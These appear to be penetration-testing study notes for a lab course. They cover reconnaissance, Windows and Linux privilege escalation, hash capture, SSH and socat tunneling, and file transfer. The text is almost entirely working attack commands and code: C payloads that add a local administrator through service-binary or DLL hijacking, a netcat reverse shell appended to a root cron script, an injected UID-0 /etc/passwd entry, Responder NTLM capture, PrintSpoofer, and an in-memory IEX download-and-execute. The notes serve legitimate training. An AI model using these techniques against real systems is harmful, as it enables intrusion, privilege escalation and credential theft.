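# ---- Passive information gathering ----
# (the original notes used "//" for comments, which the shell would try to run
#  as a command named "//"; everything below uses real "#" comments)

# Whois: -h queries a specific whois server instead of the default
whois megacorpone.com -h 192.168.50.251
whois 38.100.193.70 -h 192.168.50.251      # reverse lookup on an IP

# Google hacking: restrict results to the target, e.g.  site:megacorpone.com

# GitHub: search the organisation's repositories for leaked secrets
# (tools: Gitleaks, Gitrob)

# Shodan: hostname:megacorpone.com

# SSL/TLS: review the offered cipher suites. Disabling the legacy
# TLS_DHE_RSA_WITH_AES_256_CBC_SHA suite has been recommended for several years.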
Active Information Gathering
DNS Enumeration
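# ---- DNS enumeration (Linux) ----
# Record types worth querying: NS, A, AAAA, MX, PTR, CNAME, TXT
host www.megacorpone.com
host -t mx megacorpone.com

# Forward brute force of subdomains from a wordlist (one name per line)
sudo apt install seclists
while IFS= read -r sub; do
  host "$sub.megacorpone.com"
done < list.txt

# Reverse lookups over a range - only useful where PTR records exist;
# 'host' prints "not found" for addresses without one, so filter those out
for ip in {200..254}; do
  host "51.222.169.$ip"
done | grep -v "not found"

# Tools
dnsrecon -d megacorpone.com -t std                # std = standard record types
dnsrecon -d megacorpone.com -D ~/list.txt -t brt  # brt = brute force subdomains from -D list
dnsenum megacorpone.com                            # forward + reverse lookups

# DNS enumeration - Windows: (the Windows commands are not present in this excerpt)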
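# SMTP user enumeration against several servers; 'smtpmachines' holds one host per line.
# VRFY asks the server to confirm a mailbox name. Many servers disable VRFY;
# smtp-user-enum can also use -M EXPN or -M RCPT in that case.
while IFS= read -r server; do
  echo "****************** $server *****************"
  smtp-user-enum -M VRFY -U userlist.txt -t "$server"
done < smtpmachines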
**Windows**
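# ---- SMTP from Windows ----
# Is TCP/25 reachable on the target?
Test-NetConnection -Port 25 192.168.50.8

# The telnet client is not installed by default. Enabling the feature requires an
# elevated prompt; alternatively copy telnet.exe from another machine
# (once enabled it lives in c:\windows\system32\telnet.exe).
dism /online /Enable-Feature /FeatureName:TelnetClient

# Talk SMTP by hand, then probe a mailbox name:
telnet 192.168.50.8 25
#   VRFY goofy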
SNMP
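# ---- SNMP enumeration ----
# Hosts with UDP/161 open (UDP scans are slow; --open trims the output, -oG = grepable)
sudo nmap -sU --open -p 161 192.168.50.1-254 -oG open-snmp.txt

# Brute force community strings: candidate strings in 'community', targets in 'ips'
printf '%s\n' public private manager > community
for ip in {1..254}; do echo "192.168.50.$ip"; done > ips
onesixtyone -c community -i ips

# Walk the whole MIB (v1 shown; also try -v2c). -t 10 = timeout in seconds.
# Add -Oa to render hex strings as ASCII.
snmpwalk -c public -v1 -t 10 192.168.50.151

# Targeted OIDs on a Windows host (as given in the notes):
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.4.1.77.1.2.25    # Windows user accounts
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2   # running processes
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.6.3.1.2   # installed software
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.6.13.1.3     # TCP listening ports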
HTTP
# Directory/file brute force of the web root with a small common wordlist.
# -t 5 keeps the thread count low (quieter and less load on the target).
target="192.168.50.20"
wordlist="/usr/share/wordlists/dirb/common.txt"
gobuster dir -u "$target" -w "$wordlist" -t 5
misc
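# ---- misc ----
# RDP from Kali. Note: /p: puts the password on the command line, where it is
# visible in the process list and in shell history.
xfreerdp /u:student /p:lab /v:192.168.240.152 /dynamic-resolution

# Once on a Windows host (cmd.exe): domain and host orientation
net time /domain
ipconfig /all
systeminfo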
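# Upgrade a raw reverse shell to a pty before using ssh from it: ssh will not
# prompt for a password (and interactive tools misbehave) without a terminal.
python3 -c 'import pty; pty.spawn("/bin/bash")'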
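# ---- Hash capture: Net-NTLMv2 (works from an unprivileged foothold) ----
# Kali: Responder on the interface facing the victim. It hosts a rogue SMB server
# and records the NTLMv2 response of any client that authenticates to it.
sudo responder -I tun0

# Victim: identify the user, then make the host touch our share - any UNC access
# to our IP triggers the authentication attempt:
net user paul
dir \\192.168.119.2\test

# Kali: crack the captured hash. -m 5600 = NetNTLMv2 (confirm with hashcat --help).
# --force disables hashcat's safety checks; drop it unless the run actually needs it.
hashcat --help | grep -i "ntlm"
hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force

# Same idea through a web application: if an upload form accepts a UNC path as the
# filename, the server may try to resolve it and authenticate to our share:
#   Content-Disposition: form-data; name="myFile"; filename="\\\\192.168.45.204\\test"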
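# ---- Using captured credentials on Windows ----
# WinRM or RDP: only if the user is a member of the corresponding groups
#   (typically Remote Management Users / Remote Desktop Users).
# User has the "Log on as a batch job" right: schedule a task that runs as that user.
# User has an active session: psexec can execute commands in that user's context.
# We have a GUI session: runas starts cmd as the user whose password we know.
# runas prompts for the password interactively, so it needs a desktop session.
runas /user:backupadmin cmd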
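# ---- Information gathering from logs and history ----
# PowerShell Transcription and Script Block Logging may have recorded earlier
# commands, including credentials typed into them (Script Block Logging typically
# lands in the Microsoft-Windows-PowerShell/Operational event log, ID 4104).
Get-History
(Get-PSReadlineOption).HistorySavePath    # location of the persistent console history file

# Remote sessions: creating a PowerShell session via WinRM from inside a bind shell
# can behave unexpectedly, so use evil-winrm from Kali instead.
# Single-quote the password on the Kali side: inside double quotes bash keeps the
# backslash, so "\!\!" would be sent to the target literally.
#   evil-winrm -i target -u daveadmin -p 'qwertqwertqwert123!!'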
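# ---- Service binary hijacking ----
# List services (services.msc snap-in, Get-Service, or Get-CimInstance, which
# supersedes Get-WmiObject) and note the binary path of the running ones (PowerShell):
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

# Who may write the binary? Use icacls or Get-ACL. icacls mask letters:
#   F full, M modify, RX read+execute, R read-only, W write-only
icacls "C:\xampp\mysql\bin\mysqld.exe"
# With F (or M/W) on the binary we can replace it with our own.

# --- Kali: tiny payload that adds a local admin, cross-compiled with mingw ---
cat > adduser.c <<'EOF'
#include <stdlib.h>

/* Runs with the privileges of the service account (usually SYSTEM). */
int main(void)
{
    system("net user dave2 password123! /add");
    system("net localgroup administrators dave2 /add");
    return 0;
}
EOF
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

# --- Windows target (PowerShell) ---
iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe
# keep the original binary so the service can be restored afterwards
move C:\xampp\mysql\bin\mysqld.exe mysqld.exe
move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe

# The payload runs when the service (re)starts. Stopping it directly usually fails
# for an unprivileged user:
net stop mysql
# ... so check the start type: an Auto service will run our binary after a reboot.
Get-CimInstance -ClassName win32_service | Select Name,StartMode | Where-Object {$_.Name -like 'mysql'}
# Rebooting needs SeShutdownPrivilege. In 'whoami /priv' a state of "Disabled" only
# means the privilege is not currently enabled in the token - it can still be used.
# A reboot is disruptive: make sure it is within the rules of engagement.
whoami /priv
shutdown /r /t 0
# After the reboot, verify the new local admin exists:
Get-LocalGroupMember administrators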
Automated approach (PowerUp): find services whose binary is modifiable and replace it
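# ---- PowerUp: automate the modifiable-service search ----
# Kali: serve PowerUp.ps1 over HTTP
cp /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 .
python3 -m http.server 80

# Windows target
iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1
# -ep bypass only sidesteps the execution policy, which is not a security boundary
powershell -ep bypass
. .\PowerUp.ps1
Get-ModifiableServiceFile          # services whose binary our user can overwrite
# Replaces the service binary and restarts the service. Default payload creates the
# local user 'john' / 'Password123!' and adds it to the local Administrators group.
# Note the backup location PowerUp reports so the original binary can be restored.
Install-ServiceBinary -Name 'mysql'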
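# ---- DLL hijacking ----
# If a privileged application loads a DLL that is missing, we can plant our own DLL
# in a directory Windows searches before it gives up. Search order with
# SafeDllSearchMode enabled (the default):
#   1. the directory the application was loaded from
#   2. the system directory
#   3. the 16-bit system directory
#   4. the Windows directory
#   5. the current directory
#   6. the directories listed in PATH
# With SafeDllSearchMode disabled the current directory moves up to position 2.
# In practice, write access to the application directory (1) or a PATH entry (6)
# is what makes this exploitable.

# Windows (PowerShell): running services and their binaries
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
# If we cannot replace the binary itself, check the binary's permissions/location:
icacls .\Documents\BetaServ.exe

# Find the missing DLL with Procmon (needs admin rights; with limited rights copy the
# binary to a local VM and analyse it there). Filter menu > Filter... ->
# "Process Name is <binary>", then look for CreateFile operations on .dll paths that
# return NAME NOT FOUND.
#   C:\tools\Procmon\Procmon64.exe
# Trigger the load by restarting the service (or run the binary on the local VM):
Restart-Service BetaService
# The target's PATH matters for step 6:
#   $env:path

# --- Kali: malicious DLL; payload runs when a process attaches the DLL ---
cat > myDLL.cpp <<'EOF'
#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(HANDLE hModule,           // handle to the DLL module
                      DWORD ul_reason_for_call,  // reason for calling the function
                      LPVOID lpReserved)         // reserved
{
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:    // a process is loading the DLL
        system("net user dave2 password123! /add");
        system("net localgroup administrators dave2 /add");
        break;
    case DLL_THREAD_ATTACH:     // a process is creating a new thread
        break;
    case DLL_THREAD_DETACH:     // a thread exits normally
        break;
    case DLL_PROCESS_DETACH:    // a process unloads the DLL
        break;
    }
    return TRUE;
}
EOF
x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll

# --- Windows: save it under the exact name of the missing DLL (here myDLL.dll),
# in a writable directory that is searched first, then trigger the load ---
iwr -uri http://kali/myDLL.dll -Outfile myDLL.dll
Restart-Service BetaService
net user
net localgroup administrators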
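# ---- Unquoted service paths ----
# For an unquoted binary path containing spaces, Windows tries each prefix in turn:
#   C:\Program.exe
#   C:\Program Files\My.exe
#   C:\Program Files\My Program\My.exe
#   C:\Program Files\My Program\My service\service.exe
# If we can write to one of those directories, our binary runs as the service account.

# Find candidate services
# option 1 (PowerShell): look for PathName values with spaces and no quotes
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
# option 2 (cmd.exe syntax): drop C:\Windows\ services and anything already quoted
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

# Can our user start/stop the service? Otherwise we depend on a reboot.
Start-Service GammaService
Stop-Service GammaService

# Does our user have W (write) on one of the intermediate directories?
# The spaces in these paths are the whole point - do not drop them.
icacls "C:\Program Files"
icacls "C:\Program Files\Enterprise Apps"

# Same adduser payload as in the service binary hijacking section, named after the
# first prefix Windows will try inside the writable directory.
iwr -uri http://192.168.119.3/adduser.exe -Outfile Current.exe
copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe'
Start-Service GammaService   # may report an error; the payload usually still runs

# Automated with PowerUp (creates local user john / Password123!)
iwr http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1
powershell -ep bypass
. .\PowerUp.ps1
Get-UnquotedService
Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"   # the vulnerable location
Restart-Service GammaService
net user
net localgroup Administrators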
Scheduled Tasks
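# ---- Scheduled tasks ----
# List tasks with the Get-ScheduledTask cmdlet or schtasks. The verbose LIST output
# shows "Run As User", "Next Run Time" and "Task To Run" (the binary that executes).
schtasks /query /fo LIST /v

# A task that runs as a privileged user from a binary our user can write is exploitable:
icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe

# Swap the binary for the adduser payload; keep a .bak so it can be restored.
# The payload runs at the task's next trigger.
iwr -Uri http://kali/adduser.exe -Outfile BackendCacheCleanup.exe
move .\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe.bak
move .\BackendCacheCleanup.exe .\Pictures\
net user
net localgroup administrators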
Using Exploits
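# ---- Privilege escalation with exploits ----
# Three families:
#  - vulnerabilities in programs that run with high privileges
#  - Windows kernel vulnerabilities
#  - abuse of privileges already held by our non-admin token, e.g.
#    SeImpersonatePrivilege (impersonation via RPC / named pipes)
# Other privileges that can lead to escalation: SeBackupPrivilege,
# SeAssignPrimaryToken, SeLoadDriver, SeDebug.
# IIS application-pool accounts normally hold SeImpersonatePrivilege; PrintSpoofer
# abuses it (alternatives: RottenPotato, SweetPotato, JuicyPotato). PrintSpoofer
# relies on the Print Spooler service being available on the target.

# Windows: confirm the privilege is present
whoami /priv

# Kali: fetch and serve the binary
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
python3 -m http.server 80

# Windows: -i = interact with the new process, -c = command to run as SYSTEM
powershell
iwr -uri http://kali/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe
.\PrintSpoofer64.exe -i -c powershell.exe
whoami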
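# ---- Linux local enumeration ----
ip a                                   # interfaces and addresses
routel                                 # routing table (or: route)
ss -anp                                # all sockets with owning process
cat /etc/iptables/rules.v4             # persisted firewall rules (also: iptables-save)

# Cron: system job directories, our own jobs, and root's
# (sudo crontab -l only works if our user is allowed to run crontab via sudo)
ls -lah /etc/cron*
crontab -l
sudo crontab -l
grep "CRON" /var/log/syslog            # cron log: which scripts run, and as whom

# If a root cron job runs a script we can write to, append a reverse shell.
# Start the listener on Kali first (e.g. nc -lvnp 1234).
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.118.2 1234 >/tmp/f" >> user_backups.sh

dpkg -l                                # installed packages and versions
find / -writable -type d 2>/dev/null   # writable directories (expect /proc noise)

# Storage: unmounted partitions and available disks
cat /etc/fstab
mount
lsblk

# Kernel: loaded modules and their details (search for exploits by version)
lsmod
/sbin/modinfo libata                   # replace libata with the module of interest

# SUID / SGID binaries - check each against GTFOBins
find / -perm -u=s -type f 2>/dev/null
# e.g. if find itself is SUID root, -p keeps the effective uid:
find /home/joe/Desktop -exec "/usr/bin/bash" -p \;

# Capabilities - check against GTFOBins
/usr/sbin/getcap -r / 2>/dev/null
# e.g. perl with cap_setuid:
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# (https://gtfobins.github.io/)

# Environment and shell startup files (credentials, odd PATH entries)
env
cat .bashrc

# sudo: what may we run, and as whom (check entries against GTFOBins)
sudo -l
sudo -i                                # only if permitted
# If a sudo/GTFOBins trick fails silently, look for AppArmor denials in syslog
# (the notes hit this with tcpdump):
grep tcpdump /var/log/syslog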
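# ---- Inspecting service footprints ----
# Poll the process list every second for anything with "pass" on its command line
# (credentials passed as arguments). The [p]ass pattern stops grep matching itself.
watch -n 1 "ps aux | grep '[p]ass'"

# Sniff loopback for cleartext credentials (needs root or CAP_NET_RAW)
sudo tcpdump -i lo -A | grep "pass"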
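# ---- Writable /etc/passwd ----
# Generate a crypt hash for the password "w00t". The format depends on the openssl
# version (the 13-character value below is traditional crypt) - paste your own output.
openssl passwd w00t
# Append a second UID 0 account. This is noisy and persistent: note it down and
# remove the line when finished.
echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2      # password: w00t
id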
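# ---- Automated enumeration ----
./unix-privesc-check standard > output.txt   # 'standard' = quick checks (a slower 'detailed' mode exists)
# Other options: LinEnum, linux-exploit-suggester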
Port Redirection and SSH Tunneling
Linux Port Forwarding
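# ---- Port forwarding with socat ----
# Victim: accept on 2345 and relay each connection to the internal PostgreSQL
# server (fork = one relay per client, -ddd = verbose). Anyone who can reach the
# victim on 2345 can use the relay - close it when done.
socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432

# Kali: reach the database through the relay
psql -h 192.168.50.63 -p 2345 -U postgres
#   \l                          -- list databases
#   \c confluence               -- switch to the Confluence database
#   select * from cwd_user;     -- credential column holds values such as
#   {PKCS5S2}skupO/gzzNBHhLkzH3cejQRQSP9vY4PJNT6DrjBYBs23VRAq4F5N85OAAdCv8S34

# Put those values in hashes.txt; -m 12001 = Atlassian (PBKDF2-HMAC-SHA1), the {PKCS5S2} format
hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt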
Linux SSH Tunneling
SSH Local Port Forwarding
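# ---- SSH local port forwarding ----
# Run on the compromised host that can reach the SSH server: listen on its
# 0.0.0.0:4455 and forward through database_admin@10.4.50.215 to 172.16.50.217:445.
# -N = no remote command; add -v to debug the tunnel.
# Binding 0.0.0.0 is what lets Kali connect in, but it also exposes the forward to
# anyone who can reach that host on 4455.
ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215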
SSH Dynamic Port Forwarding
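# ---- SSH dynamic port forwarding (SOCKS) ----
# On the compromised host: get a pty first, then open a SOCKS proxy on its
# 0.0.0.0:9999 whose connections exit from 10.4.50.215. As with -L, 0.0.0.0 makes
# the proxy usable by anyone who can reach that host.
python3 -c 'import pty; pty.spawn("/bin/bash")'
ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215

# Kali: point proxychains at the compromised host's SOCKS port
tail /etc/proxychains4.conf
#   [ProxyList]
#   socks5 192.168.50.63 9999

proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234

# Scanning through SOCKS: only full TCP connects traverse the proxy, so use -sT
# and skip host discovery (-Pn). Lowering tcp_read_time_out and
# tcp_connect_time_out in proxychains4.conf speeds the scan up.
proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217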
SSH Remote Port Forwarding
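# ---- SSH remote port forwarding ----
# Kali is the SSH server and the victim is the SSH client, connecting out to Kali.
# -R makes sshd on Kali listen on the given port and push every connection back
# through the tunnel; the client then forwards it to the configured target.
# Needs PasswordAuthentication yes in /etc/ssh/sshd_config on Kali (or keys).
# Caveat: this types Kali credentials on a compromised host (shell history, possible
# keyloggers) and exposes Kali's sshd - use a dedicated low-privilege account with a
# strong password, and stop sshd afterwards.
sudo systemctl start ssh           # kali
sudo ss -ntplu                     # kali: confirm sshd is listening

python3 -c 'import pty; pty.spawn("/bin/bash")'   # victim: pty first
# victim: -R [bind_addr:]port:target:targetport  (bind on Kali's loopback only)
ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4

psql -h 127.0.0.1 -p 2345 -U postgres             # kali
#   \l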
SSH Remote Dynamic Port Forwarding
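# ---- SSH remote dynamic port forwarding ----
# -R with a single port opens a SOCKS proxy on the SSH server (Kali) whose connections
# exit from the client (victim). Only the OpenSSH *client* needs to be 7.6 or newer
# for this; the server version does not matter.
sudo systemctl start ssh           # kali
sudo ss -ntplu                     # kali

python3 -c 'import pty; pty.spawn("/bin/bash")'   # victim
ssh -N -R 9998 kali@192.168.118.4                 # victim

# kali: point proxychains at the local SOCKS port
sudo vim /etc/proxychains4.conf
#   [ProxyList]
#   socks5 127.0.0.1 9998
proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.4.50.64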
Using sshuttle
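# ---- sshuttle (transparent, VPN-like routing over SSH) ----
# Victim: the database server's SSH port is not reachable from Kali directly,
# so relay 2222 on the compromised host to it with socat:
socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22
# Kali: route the two internal subnets through the SSH session. sshuttle needs
# python on the remote side and will ask for local sudo to set up the routing.
sshuttle -r database_admin@192.168.50.63:2222 10.4.50.0/24 172.16.50.0/24
# Tools now reach the internal network without proxychains:
smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234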
Port Forwarding with Windows Tools
SSH
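# ---- Port forwarding with Windows tools: built-in OpenSSH client ----
# Since Windows 10 1803 (April 2018 Update) the OpenSSH client utilities ship with
# Windows in %systemdrive%\Windows\System32\OpenSSH.

# Remote dynamic port forward (client must be OpenSSH >= 7.6)
sudo systemctl start ssh                      # kali
where ssh                                     # windows: confirm the client is present
ssh -N -R 9998 kali@192.168.118.4             # windows -> kali
ss -ntplu                                     # kali: SOCKS listener on 9998
# kali: proxychains configuration
vim /etc/proxychains4.conf
#   [ProxyList]
#   socks5 127.0.0.1 9998
proxychains psql -h 10.4.50.215 -U postgres   # kali
#   \l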
Plink
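# ---- Plink (PuTTY's command-line SSH client) ----
# Kali: serve plink.exe over HTTP
sudo systemctl start apache2
find / -name plink.exe 2>/dev/null
sudo cp /usr/share/windows-resources/binaries/plink.exe /var/www/html/
# Windows: fetch it (the plink -R tunnel command itself is not in this excerpt)
powershell wget -Uri http://192.168.118.4/plink.exe -OutFile C:\Windows\Temp\plink.exe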
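# ---- File transfer 1: FTP with pyftpdlib ----
# Kali: anonymous FTP server rooted in the current directory. -w allows anonymous
# writes, so anyone who can reach the port can upload. pyftpdlib listens on 2121
# by default (run as root with -p 21 for the standard port) - use the port it prints.
python3 -m pyftpdlib -w
# Windows: at the ftp> prompt
#   open <LinuxIP> <Port>
#   user: anonymous   password: anonymous
#   put <windows_file>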
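# ---- File transfer 2: Impacket SMB server ----
# Kali: share the current directory as "test". -smb2support is needed because modern
# Windows disables SMB1; the username/password avoid Windows' default block on
# unauthenticated guest access to shares.
impacket-smbserver test . -smb2support -username kourosh -password kourosh

# Windows - option 1: copy straight to the UNC path (PowerShell)
copy-item .\Database.kdbx \\192.168.45.204\test\Database.kdbx
# Windows - option 2: map a drive letter, then copy (cmd.exe)
net use m: \\Kali_IP\test /user:kourosh kourosh
copy mimikatz.log m:\
# (delete the mapping with: net use m: /delete)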
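# ---- File transfer 4: powercat ----
# Host powercat.ps1 (https://github.com/besimorhino/powercat/blob/master/powercat.ps1)
# on a web server on Kali. Windows loads it in memory over plaintext HTTP, listens on
# 4444 and sends the file (-i) to the first client that connects:
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://kali-ip/powercat.ps1');powercat -l -p 4444 -i C:\Users\test\FileToTransfer"
# Kali: receive. powercat -i writes the raw file to the TCP connection with no HTTP
# framing, so a plain TCP client is the reliable receiver; wget (as in the original
# notes: wget http://windows-ip:4444/FileToTransfer) expects an HTTP response and may
# reject the stream.
nc windows-ip 4444 > FileToTransfer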